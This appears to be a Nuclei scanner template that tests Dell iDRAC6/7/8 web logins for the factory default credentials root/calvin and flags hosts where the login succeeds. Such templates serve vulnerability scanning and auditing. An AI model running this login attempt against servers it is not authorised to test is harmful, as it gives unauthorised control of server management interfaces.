id: dell-idrac-default-login
info:
  name: Dell iDRAC6/7/8 Default login
  author: kophjager007
  severity: high
  tags: dell,idrac,default-login

requests:
  - raw:
      - |
        POST /data/login HTTP/1.1
        Host: {{Hostname}}

        user={{username}}&password={{password}}

    payloads:
      username:
        - root
      password:
        - calvin
    attack: pitchfork

    headers:
      Content-Type: "application/x-www-form-urlencode"
      Referer: "{{BaseURL}}/login.html"

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '<authResult>0</authResult>'
